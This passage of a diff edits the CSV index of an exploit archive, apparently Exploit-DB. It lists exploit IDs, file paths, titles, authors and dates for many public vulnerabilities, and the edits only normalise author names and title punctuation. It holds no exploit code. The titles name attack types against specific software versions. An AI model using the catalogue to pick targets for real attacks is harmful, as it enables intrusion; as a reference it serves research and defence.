Service",2003-10-26,"Marc Schoenefeld",multiple,dos,0 @@ -20545,7 +20545,7 @@ id,file,description,date,author,platform,type,port 23317,platforms/hardware/remote/23317.txt,"Seyeon FlexWATCH Network Video Server 2.2 Unauthorized Administrative Access",2003-10-31,slaizer,hardware,remote,0 23318,platforms/windows/remote/23318.txt,"Ashley Brown iWeb Server Encoded Backslash Directory Traversal",2003-10-31,cr-secure.net,windows,remote,0 23319,platforms/php/webapps/23319.txt,"Tritanium Scripts Tritanium Bulletin Board 1.2.3 Unauthorized Access",2003-10-31,"Virginity Security",php,webapps,0 -23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 +23320,platforms/multiple/remote/23320.txt,"Mldonkey 2.5 -4 - Web Interface Error Message Cross-Site Scripting",2003-10-31,"Chris Sharp",multiple,remote,0 23321,platforms/windows/remote/23321.txt,"Microsoft Internet Explorer 6-10 Mouse Tracking",2012-12-12,"Nick Johnson",windows,remote,0 23322,platforms/php/webapps/23322.txt,"TipsOfTheDay MyBB Plugin - Multiple Vulnerabilities",2012-12-12,VipVince,php,webapps,0 23323,platforms/windows/remote/23323.py,"Novell File Reporter Agent XML Parsing Remote Code Execution (0Day)",2012-12-12,Abysssec,windows,remote,0 @@ -20587,7 +20587,7 @@ id,file,description,date,author,platform,type,port 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 23386,platforms/php/webapps/23386.txt,"Justin Hagstrom Auto Directory Index 1.2.3 - Cross-Site Scripting",2003-11-17,"David Sopas Ferreira",php,webapps,0 23359,platforms/php/webapps/23359.txt,"MyBB DyMy User Agent Plugin (newreply.php) - SQL Injection",2012-12-13,JoinSe7en,php,webapps,0 -23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,metasploit,linux,remote,0 +23360,platforms/linux/remote/23360.rb,"PostgreSQL for Linux Payload Execution",2012-12-13,Metasploit,linux,remote,0 23361,platforms/hardware/dos/23361.txt,"Cisco Wireless Lan Controller 7.2.110.0 - Multiple Vulnerabilities",2012-12-13,"Jacob Holcomb",hardware,dos,0 23362,platforms/php/webapps/23362.py,"Centreon Enterprise Server 2.3.3-2.3.9-4 - Blind SQL Injection Exploit",2012-12-13,modpr0be,php,webapps,0 23363,platforms/php/webapps/23363.txt,"phpBB 2.0.x Profile.php SQL Injection",2003-11-08,JOCANOR,php,webapps,0 @@ -20687,7 +20687,7 @@ id,file,description,date,author,platform,type,port 23468,platforms/windows/dos/23468.pl,"Xlight FTP Server 1.25/1.41 PASS Command Remote Buffer Overflow",2003-12-23,storm,windows,dos,0 23469,platforms/windows/dos/23469.txt,"Adobe Flash Player 11.5.502.135 - Crash PoC",2012-12-18,coolkaveh,windows,dos,0 23629,platforms/cgi/webapps/23629.txt,"Leif M. Wright Web Blog 1.1 - Remote Command Execution",2004-01-31,ActualMInd,cgi,webapps,0 -23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",2012-12-18,metasploit,windows,remote,0 +23472,platforms/windows/remote/23472.rb,"Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",2012-12-18,Metasploit,windows,remote,0 23631,platforms/php/webapps/23631.txt,"PHP-Nuke 6.x - Multiple Module SQL Injection Vulnerabilities",2004-02-02,"Security Corporation",php,webapps,0 23473,platforms/php/webapps/23473.txt,"My Little Forum 1.3 Email.php Cross-Site Scripting",2003-12-23,"David S. Ferreira",php,webapps,0 23474,platforms/php/webapps/23474.txt,"Webfroot Shoutbox 2.32 Viewshoutbox.php Cross-Site Scripting",2003-12-23,"Ben Drysdale",php,webapps,0 @@ -20717,7 +20717,7 @@ id,file,description,date,author,platform,type,port 23695,platforms/windows/remote/23695.txt,"Microsoft Internet Explorer 5.0.1 ITS Protocol Zone Bypass",2004-02-13,anonymous,windows,remote,0 23498,platforms/hardware/webapps/23498.txt,"SonicWall SonicOS 5.8.1.8 WAF XSS",2012-12-19,Vulnerability-Lab,hardware,webapps,0 23499,platforms/hardware/webapps/23499.txt,"Enterpriser16 Load Balancer 7.1 - Multiple XSS Vulnerabilities",2012-12-19,Vulnerability-Lab,hardware,webapps,0 -23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,metasploit,windows,remote,0 +23500,platforms/windows/remote/23500.rb,"InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",2012-12-20,Metasploit,windows,remote,0 23628,platforms/php/webapps/23628.txt,"JBrowser 1.0/2.x Unauthorized Admin Access",2004-01-30,"Himeur Nourredine",php,webapps,0 23501,platforms/windows/dos/23501.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (1)",2003-12-29,"Behrang Fouladi",windows,dos,0 23502,platforms/windows/remote/23502.c,"Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow (2)",2003-12-29,"Rosiello Security",windows,remote,0 @@ -20782,12 +20782,12 @@ id,file,description,date,author,platform,type,port 23560,platforms/windows/remote/23560.txt,"anteco visual technologies ownserver 1.0 - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 23561,platforms/asp/webapps/23561.txt,"DUware Software - Multiple Vulnerabilities",2004-01-20,"Security Corporation",asp,webapps,0 23562,platforms/windows/remote/23562.html,"2Wire HomePortal Series - Directory Traversal",2004-01-20,"Rafel Ivgi The-Insider",windows,remote,0 -23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23565,platforms/windows/dos/23565.txt,"Sony PC Companion 2.1 - (DownloadURLToFile()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23563,platforms/multiple/remote/23563.txt,"Darkwet Network WebcamXP 1.6.945 - Cross-Site Scripting",2004-01-21,"Rafel Ivgi The-Insider",multiple,remote,0 23564,platforms/multiple/remote/23564.txt,"Mephistoles HTTPD 0.6 - Cross-Site Scripting",2004-01-21,"Donato Ferrante",multiple,remote,0 -23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 (Load()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 -23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23567,platforms/windows/dos/23567.txt,"Sony PC Companion 2.1 - (Load()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23568,platforms/windows/dos/23568.txt,"Sony PC Companion 2.1 - (CheckCompatibility()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 +23569,platforms/windows/dos/23569.txt,"Sony PC Companion 2.1 - (Admin_RemoveDirectory()) Stack-based Unicode Buffer Overflow",2012-12-21,LiquidWorm,windows,dos,0 23571,platforms/asp/webapps/23571.txt,"SelectSurvey CMS (ASP.NET) Arbitrary File Upload",2012-12-21,040,asp,webapps,0 23572,platforms/hardware/webapps/23572.txt,"YeaLink IP Phone SIP-TxxP firmware <= 9.70.0.100 - Multiple Vulnerabilities",2012-12-21,xistence,hardware,webapps,0 23573,platforms/php/webapps/23573.txt,"banana dance b.2.6 - Multiple Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -20795,8 +20795,8 @@ id,file,description,date,author,platform,type,port 23575,platforms/php/webapps/23575.txt,"Elite Bulletin Board 2.1.21 - Multiple SQL Injection Vulnerabilities",2012-12-21,"High-Tech Bridge SA",php,webapps,0 23878,platforms/windows/remote/23878.txt,"HP Web Jetadmin 7.5.2456 Printer Firmware Update Script Arbitrary File Upload Weakness",2004-03-24,wirepair,windows,remote,0 23877,platforms/windows/remote/23877.txt,"NexGen FTP Server 1.0/2.x - Remote Directory Traversal",2004-03-24,"Ziv Kamir",windows,remote,0 -23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 -23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT Remote Command Execution",2012-12-23,metasploit,unix,remote,0 +23579,platforms/unix/remote/23579.rb,"TWiki MAKETEXT Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 +23580,platforms/unix/remote/23580.rb,"Foswiki MAKETEXT Remote Command Execution",2012-12-23,Metasploit,unix,remote,0 23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl Module File Descriptor Leakage",2004-01-21,"Steve Grubb",linux,local,0 23582,platforms/cgi/remote/23582.txt,"Acme thttpd 1.9/2.0.x CGI Test Script Cross-Site Scripting",2004-01-22,"Rafel Ivgi The-Insider",cgi,remote,0 23583,platforms/multiple/remote/23583.txt,"Netbus 2.0 Pro Directory Listings Disclosure and File Upload",2004-01-22,"Rafel Ivgi The-Insider",multiple,remote,0 @@ -20817,8 +20817,8 @@ id,file,description,date,author,platform,type,port 23598,platforms/multiple/remote/23598.txt,"IBM Net.Data 7.0/7.2 db2www Error Message Cross-Site Scripting",2004-01-26,"Carsten Eiram",multiple,remote,0 23599,platforms/php/webapps/23599.txt,"Gallery 1.3.x/1.4 - Remote Global Variable Injection",2004-01-26,"Bharat Mediratta",php,webapps,0 23600,platforms/multiple/remote/23600.txt,"Herberlin BremsServer 1.2.4 - Cross-Site Scripting",2004-01-26,"Donato Ferrante",multiple,remote,0 -23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,metasploit,windows,remote,0 -23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,metasploit,multiple,remote,0 +23694,platforms/windows/remote/23694.rb,"RealPlayer RealMedia File Handling Buffer Overflow",2012-12-27,Metasploit,windows,remote,0 +23601,platforms/multiple/remote/23601.rb,"Netwin SurgeFTP Remote Command Execution",2012-12-23,Metasploit,multiple,remote,0 23602,platforms/windows/dos/23602.txt,"mIRC 6.1 DCC Get Dialog Denial of Service",2004-01-26,"MASTER VIPER",windows,dos,0 23603,platforms/windows/remote/23603.py,"herberlin bremsserver 1.2.4/3.0 - Directory Traversal",2004-01-26,"Donato Ferrante",windows,remote,0 23604,platforms/linux/remote/23604.txt,"Antologic Antolinux 1.0 - Administrative Interface NDCR Parameter Remote Command Execution",2004-01-26,"Himeur Nourredine",linux,remote,0 @@ -20865,10 +20865,10 @@ id,file,description,date,author,platform,type,port 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 -23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server Database Link Crawling Command Execution",2012-12-25,metasploit,windows,remote,0 -23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler Command Injection",2012-12-25,metasploit,windows,remote,0 -23651,platforms/php/remote/23651.rb,"WordPress WP-Property - PHP File Upload",2012-12-25,metasploit,php,remote,0 -23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager - PHP File Upload",2012-12-25,metasploit,php,remote,0 +23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 +23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler Command Injection",2012-12-25,Metasploit,windows,remote,0 +23651,platforms/php/remote/23651.rb,"WordPress WP-Property - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 @@ -20941,8 +20941,8 @@ id,file,description,date,author,platform,type,port 23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0 23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0 23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS <= 5.5.2 - Remote POST-Auth Root Command Execution",2012-12-29,xistence,hardware,remote,0 -23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 -23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,metasploit,windows,remote,0 +23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 +23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow",2012-12-31,Metasploit,windows,remote,0 23738,platforms/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilites",2004-02-21,Li0n7,linux,local,0 23739,platforms/windows/local/23739.txt,"Dell TrueMobile 1300 WLAN System 3.10.39.0 Tray Applet - Local Privilege Escalation",2004-02-22,"Ian Vitek",windows,local,0 23740,platforms/linux/local/23740.c,"Samhain Labs 1.x HSFTP Remote Format String",2004-02-23,priest@priestmaster.org,linux,local,0 @@ -20959,7 +20959,7 @@ id,file,description,date,author,platform,type,port 23751,platforms/windows/remote/23751.txt,"Apache Cygwin 1.3.x/2.0.x - Directory Traversal",2004-02-24,"Jeremy Bae",windows,remote,0 23752,platforms/windows/dos/23752.c,"Digital Reality Game Engine 1.0.x - Remote Denial of Service",2004-02-24,"Luigi Auriemma",windows,dos,0 23753,platforms/php/webapps/23753.txt,"Working Resources BadBlue Server 2.40 - phptest.php Path Disclosure",2004-02-24,"Rafel Ivgi",php,webapps,0 -23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free",2012-12-31,metasploit,windows,remote,0 +23754,platforms/windows/remote/23754.rb,"Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free",2012-12-31,Metasploit,windows,remote,0 23755,platforms/multiple/dos/23755.txt,"RedStorm Ghost Recon Game Engine Remote Denial of Service",2004-02-24,"Luigi Auriemma",multiple,dos,0 23756,platforms/multiple/remote/23756.txt,"Seyeon Technology FlexWATCH Server 2.2 - Cross-Site Scripting",2004-02-24,"Rafel Ivgi The-Insider",multiple,remote,0 23757,platforms/linux/dos/23757.txt,"Gamespy Software Development Kit Remote Denial of Service",2004-02-24,"Luigi Auriemma",linux,dos,0 @@ -20991,7 +20991,7 @@ id,file,description,date,author,platform,type,port 24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 index.php SQL Injection",2004-04-23,waraxe,php,webapps,0 24048,platforms/php/webapps/24048.txt,"Protector System 1.15 blocker_query.php Multiple Parameter XSS",2004-04-23,waraxe,php,webapps,0 24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0 -23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free",2013-01-02,metasploit,windows,remote,0 +23785,platforms/windows/remote/23785.rb,"Microsoft Internet Explorer CButton Object Use-After-Free",2013-01-02,Metasploit,windows,remote,0 23786,platforms/hardware/dos/23786.c,"Nortel Wireless LAN Access Point 2200 Series Denial of Service",2004-03-02,"Alex Hernandez",hardware,dos,0 23787,platforms/multiple/dos/23787.txt,"1st Class Internet Solutions 1st Class Mail Server 4.0 - Remote Buffer Overflow",2004-03-02,JeFFOsZ,multiple,dos,0 23788,platforms/hardware/dos/23788.pl,"SureCom EP-9510AX/EP-4504AX Network Device Malformed Web Authorization Request Denial of Service (1)",2004-03-02,"Vasco Costa",hardware,dos,0 @@ -21059,7 +21059,7 @@ id,file,description,date,author,platform,type,port 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 error.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 register.asp err Parameter XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 -23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,metasploit,php,remote,0 +23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 comment_add.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 category_news_headline.asp XSS",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -21088,9 +21088,9 @@ id,file,description,date,author,platform,type,port 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 23886,platforms/windows/webapps/23886.txt,"simple webserver 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 -23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,metasploit,windows,remote,0 +23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,Metasploit,windows,remote,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow",2013-01-08,metasploit,windows,remote,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow",2013-01-08,Metasploit,windows,remote,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0 23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 23892,platforms/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,linux,local,0 @@ -21168,7 +21168,7 @@ id,file,description,date,author,platform,type,port 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script Multiple SQL Injection Vulnerabilities",2013-01-08,"cr4wl3r ",php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS",2013-01-08,"SecPod Research",asp,webapps,0 -23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,metasploit,php,webapps,0 +23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21213,10 +21213,10 @@ id,file,description,date,author,platform,type,port 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 24016,platforms/php/webapps/24016.txt,"Phorum 3.4.x Phorum_URIAuth SQL Injection",2004-04-19,"Janek Vind",php,webapps,0 24017,platforms/windows/remote/24017.html,"Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR & DEP Bypass (MS12-037)",2013-01-10,sickness,windows,remote,0 -24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload",2013-01-10,metasploit,php,remote,0 -24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,metasploit,multiple,remote,0 -24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,metasploit,windows,remote,0 -24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,metasploit,windows,remote,0 +24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload",2013-01-10,Metasploit,php,remote,0 +24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,Metasploit,multiple,remote,0 +24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer Option Element Use-After-Free",2013-01-10,Metasploit,windows,remote,0 +24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 @@ -21240,7 +21240,7 @@ id,file,description,date,author,platform,type,port 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpLiteAdmin <= 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 -24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,metasploit,java,remote,0 +24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 @@ -21261,7 +21261,7 @@ id,file,description,date,author,platform,type,port 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 24067,platforms/unix/remote/24067.c,"LHA 1.x - Buffer Overflow/Directory Traversal Vulnerabilities",2004-04-30,N4rK07IX,unix,remote,0 24068,platforms/php/webapps/24068.txt,"SquirrelMail 1.4.x Folder Name Cross-Site Scripting",2004-04-30,"Alvin Alex",php,webapps,0 -24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 +24069,platforms/windows/remote/24069.html,"Microsoft Internet Explorer 6.0 - Meta Data Foreign Domain Spoofing",2004-04-30,E.Kellinis,windows,remote,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1 B Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24071,platforms/php/webapps/24071.txt,"Moodle 1.1/1.2 - Cross-Site Scripting",2004-04-30,"Bartek Nowotarski",php,webapps,0 24072,platforms/php/webapps/24072.txt,"Coppermine Photo Gallery 1.x menu.inc.php CPG_URL Parameter XSS",2004-04-30,"Janek Vind",php,webapps,0 @@ -21277,7 +21277,7 @@ id,file,description,date,author,platform,type,port 24082,platforms/php/webapps/24082.txt,"Simple Machines Forum 1.0 Size Tag HTML Injection",2004-05-05,"Cheng Peng Su",php,webapps,0 24083,platforms/php/webapps/24083.txt,"PHPX 3.x - Multiple Cross-Site Scripting Vulnerabilities",2004-05-05,JeiAr,php,webapps,0 24084,platforms/multiple/remote/24084.py,"Nagios history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0 -24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 (go param) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 +24086,platforms/php/webapps/24086.txt,"phlyLabs phlyMail Lite 4.03.04 - (go param) Open Redirect",2013-01-13,LiquidWorm,php,webapps,0 24087,platforms/php/webapps/24087.txt,"phlyLabs phlyMail Lite 4.03.04 Path Disclosure and Stored XSS Vulnerabilities",2013-01-13,LiquidWorm,php,webapps,0 24088,platforms/php/webapps/24088.txt,"PHPX 3.x admin/page.php CSRF Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 24089,platforms/php/webapps/24089.txt,"PHPX 3.x admin/news.php CSRF Arbitrary Command Execution",2004-05-05,JeiAr,php,webapps,0 @@ -21309,7 +21309,7 @@ id,file,description,date,author,platform,type,port 24116,platforms/windows/remote/24116.txt,"Microsoft Internet Explorer 5_ Firefox 0.8_ OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification",2004-05-13,"Karol Wiesek",windows,remote,0 24117,platforms/windows/remote/24117.txt,"Microsoft Internet Explorer 6.0 Codebase Double Backslash Local Zone File Execution Weakness",2003-11-25,"Liu Die Yu",windows,remote,0 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 -24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos,0 +24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos,0 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 @@ -21322,7 +21322,7 @@ id,file,description,date,author,platform,type,port 24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPD 2.x/3.0 Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24130,platforms/multiple/dos/24130.txt,"ActivePerl 5.x / Larry Wall Perl 5.x - Duplication Operator Integer Overflow",2004-05-18,"Matt Murphy",multiple,dos,0 24131,platforms/php/webapps/24131.txt,"dsm light Web file browser 2.0 - Directory Traversal",2004-05-18,Humberto,php,webapps,0 -24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,metasploit,windows,remote,0 +24133,platforms/windows/remote/24133.rb,"Freesshd Authentication Bypass",2013-01-15,Metasploit,windows,remote,0 24134,platforms/php/webapps/24134.txt,"CMS snews SQL Injection",2013-01-15,"By onestree",php,webapps,0 24135,platforms/windows/dos/24135.html,"Microsoft Internet Explorer 5.0.1 CSS Style Sheet Memory Corruption",2004-05-18,henkie_is_leet,windows,dos,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x Embedded Image URI Obfuscation Weakness",2004-05-18,"Drew Copley",linux,remote,0 @@ -21350,7 +21350,7 @@ id,file,description,date,author,platform,type,port 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1_ Opera 7.51 - URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager CSRF",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 